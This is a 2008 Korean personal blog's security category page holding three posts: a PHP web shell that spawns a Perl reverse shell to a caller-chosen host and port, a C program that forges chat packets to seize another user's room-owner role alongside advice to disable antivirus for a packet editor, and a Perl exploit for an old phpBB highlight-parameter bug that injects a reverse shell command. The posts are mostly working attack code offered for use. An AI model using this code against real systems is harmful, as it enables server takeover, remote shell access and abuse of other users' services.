알라신께충성 ::

PHP + PERL Shell Binding

Security 2008/07/23 23:42 posted by 알라신께충성

<?php
/*

+-----------------------------------+ 
| PHP + PERL Shell Binding          | 
| By bando                          | 
+-----------------------------------+

1. reverse.php (host default : $_SERVER[REMOTE_ADDR])

>>> http://xxxxxx.com/reverse.php?port=5555
    >>> Connected >>> xxx.xxx.xxx.xxx:5555
    or
    >>> http://xxxxxx.com/reverse.php?host=xxx.xxx.xxx.xxx&port=5555
    >>> Connected >>> xxx.xxx.xxx.xxx:5555

2. local or remote system

[root@bando ~]$ nc -l -p 5555
    >>> victim : xxx.xxx.xxx.xxx
    id
    uid=48(apache) gid=48(apache) groups=48(apache)

*/

$host = ($_GET[host]) ? $_GET[host] : $_SERVER[REMOTE_ADDR];
$port = ($_GET[port]) ? $_GET[port] : 31337;
$victim = $_SERVER[SERVER_ADDR];
$v0zlt = "perl -e 'use Socket;socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || exit 1;if (!connect(SOCK, pack \"SnA4x8\", 2, $port, inet_aton(\"$host\"))) {exit 1;}if ( !fork() ) {send(SOCK,\">>> victim : $victim\n\",0);open(STDIN,\">&SOCK\");open(STDOUT,\">&SOCK\");open(STDERR,\">&SOCK\");system(\"/bin/sh\");exit(0);}print \"Connected >>> $host:$port\n\"' ";
system($v0zlt);
?>

TAG PERL, PHP, Security

받은 트랙백이 없고 , 댓글이 없습니다.

Trackbas address :: http://vozlt.org/trackback/20

Winsock Packet Editor (WPE) Pro 프로그램

Security 2008/02/03 20:40 posted by 알라신께충성

wpepro09x.zip

프로그램 홈페이지 : http://wpepro.net
프로그램 공지사항

Notice

Many anti-virus programs detect WPE Pro as a Virus or Trojan, however it is not. Some anti-virus programs will even go so far as deleting the file from your computer when you extract or, not let you run the program. To get past this, you'll simply need to disable your anti-virus program when you plan to use WPE Pro.

I take no responsibility for your actions with WPE pro. By downloading WPE pro you hereby take all responsibility for your actions. If you have several computers on a LAN, you must make sure that you have permission from everyone on the LAN before running WPE Pro. If you do not, the program will capture all data sent on the network, breaching other's privacy, and the law.

해석 :
많은 백신들이 WPE Pro를 Virus 또는 Trojan으로 잡아내지만 아니다~
몇몇 백신들은 심지어 지금까지도 니가 압축풀때나 니가 WPE Pro를 실행하려고 할때 지워버릴지도 모른다
이문제를 해결하려면 니는 간단하게 WPE 실행할때 니 백신을 꺼버려라~~

나는 WPE Pro 를 사용하는 니 행동에 책임없다~~ 어쩌구 저쩌구~
해석이 맞나??

하여간 제작자 말대로 바이러스라고 나온다고 나한테 바이러스 쳐 심었다느니 그러지말고 제작자 홈페이지가서 다운 받으면 속 편할듯~

* Socket Id 에 직접 만든 패킷을 전달하려고 간단히 제작한 패킷 생성 프로그램
(예전에 xxxxx 챗방에서 방장을 뺏어 달라는 아는 친구의 부탁에...)

/* 
  *
  * Coded By Bando 
  * Date : 20050515 
  * 
  */ 
#include <stdio.h> 
#include <string.h>

#define PACKET_FILE "spacket.spt" 
#define EXIT_SUCCESS 0 
#define EXIT_FAILURE 1

int main(int argc, char **argv) {

FILE *fp;

// 01 00 00 00 08 00 00 00 4E 65 77 20 53 65 6E 64 
    // 29 00 00 00 25 00 00 00 D2 6A 11 0F c0 A8 00 02 
    // 2F 54 52 41 4E 53 5F 54 45 58 54 01 ~~~~ 02 
     
    int pk_len;

char pkcode[]="\x01\x00\x00\x00\x08\x00\x00\x00\x4E\x65\x77\x20\x53\x65\x6E\x64"; 
    char pkcode1[]="\x00\x00\x00\xD2\x6A\x11\x0F\xc0\xA8\x00\x02"; 
    char pkcode2[]="\x2F\x54\x52\x41\x4E\x53\x5F\x54\x45\x58\x54\x01";

if (argc < 3) { 
        printf("Packet Create : By HackArena\n\n"); 
        printf("생성 패킷 파일 : spacket.spt\n\n"); 
        printf("USAGE : %s [ 내아이디 ] [ 방장아뒤 ]\n", argv[0]); 
        exit(EXIT_FAILURE); 
    }

pk_len = strlen(argv[1]) + strlen(argv[2]) + 26;

if (( fp = fopen(PACKET_FILE,"wb")) == NULL ) { 
        return (EXIT_FAILURE); 
    } 
     
    fwrite(pkcode, sizeof(char), sizeof(pkcode) - 1, fp);

putc(pk_len , fp); putc(0x00 , fp); putc(0x00 , fp); putc(0x00 , fp); putc(pk_len - 4 , fp); 
    fwrite(pkcode1, sizeof(char), sizeof(pkcode1) - 1, fp); 
    fwrite(pkcode2, sizeof(char), sizeof(pkcode2) - 1, fp);

fputs(strupr(argv[2]) ,fp); 
    putc(0x01 , fp); 
    fputs(strupr(argv[1]) ,fp); 
    putc(0x02 , fp); 
    printf("FILE : %s : 생성 완료!\n", PACKET_FILE );

fclose(fp);

}

TAG C/C++, Security

받은 트랙백이 없고 , 댓글이 없습니다.

Trackbas address :: http://vozlt.org/trackback/3

PHPBB EXPLOIT

Security 2008/02/03 19:52 posted by 알라신께충성

몇년전에 phpbb bug 나와서 리버스 쉘 띄우려고 간단히 Perl로 만들었던 건데 몇버젼 버그였는지 생각도 안나는군~
즐핵 하려면 몇년전으로 돌아가야 할듯~ ㅋㅋㅋ

#! /usr/bin/perl
# By Bando
# PHPBB EXPLOIT Binding Shell Version
#
#  [bando@xxx.xxx.xxx.xxx SECURITY]$ nc -l -p 31337
# 
#  [bando@bando SECURITY]$ ./phpbbexploit.pl http://xxxxxxx.net/phpBB2/ xxx.xxx.xxx.xxx 31337
#  ===========PHPBB=EXPLOIT===========
#  ATTACK RESULT : [ SUCESS ]
# 
#  [bando@xxx.xxx.xxx.xxx SECURITY]$ nc -l -p 31337
#  SUCESS COMMAND : id
#  uid=80(www) gid=80(www) groups=80(www)

use IO::Socket;
use LWP::Simple;

if ($#ARGV < 2) { print "USAGE   : $0  [PHPBBURL]  [NCHOST]  [NCPORT]  [TNUMBER(default 2)]\nEXAMPLE : $0  http://xxxxxxx.net/phpBB2/  xxx.xxx.xxx.xxx  31337\n"; exit 0;}

$host = $ARGV[1];
$port = $ARGV[2];

$cmdSplit = "===========PHPBB=EXPLOIT===========";

$rever = "perl -e 'use Socket;socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || exit 1;if (!connect(SOCK, pack \"SnA4x8\", 2, $port, inet_aton(\"$host\"))) {exit 1;}if ( !fork() ) {send(SOCK,\"SUCESS COMMAND : \",0);open(STDIN,\">&SOCK\");open(STDOUT,\">&SOCK\");open(STDERR,\">&SOCK\");system(\"/bin/sh\");exit(0);}print \"ATTACK RESULT : [ SUCESS ]\\n\"' ";

$cmd = "echo $cmdSplit;$rever;echo $cmdSplit;";
$startEnd = 0;
$tnum = ($ARGV[3]) ? $ARGV[3] : 2;
$hlCmd = "viewtopic.php?t=$tnum&highlight=%2527%252esystem(";
@cmdchr = unpack("C*", $cmd);
$hlCmd .= "chr(". $cmdchr[0] .")";
foreach(1..$#cmdchr) { $hlCmd .= "%252echr(". $cmdchr[$_] .")"; }
$hlCmd .= ")%252e%2527";
$html = get("$ARGV[0]$hlCmd");

@cmdRet=split(/\r\n|\n/,$html);

foreach(0..$#cmdRet) {
        if ($cmdRet[$_] =~ /^$cmdSplit$/g) { $startEnd++; }
        if ($startEnd > 0 && $startEnd < 2) { $ret .= $cmdRet[$_] ."\n"; }
        if ($startEnd >= 2) { last; }
}

($ret) ? print $ret : print "$ARGV[0] [ PATCHED ]\n";

TAG PERL, Security

받은 트랙백이 없고 , 댓글이 없습니다.

일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

알라신께충성

'Security'에 해당되는 글 3건

PHP + PERL Shell Binding

Trackbas address :: http://vozlt.org/trackback/20

Winsock Packet Editor (WPE) Pro 프로그램

Trackbas address :: http://vozlt.org/trackback/3

PHPBB EXPLOIT

Trackbas address :: http://vozlt.org/trackback/2

Notices

Search

Categories

Site Tags

recent Entries

recent Comments

recent Trackbacks

Archives

Calendar

Links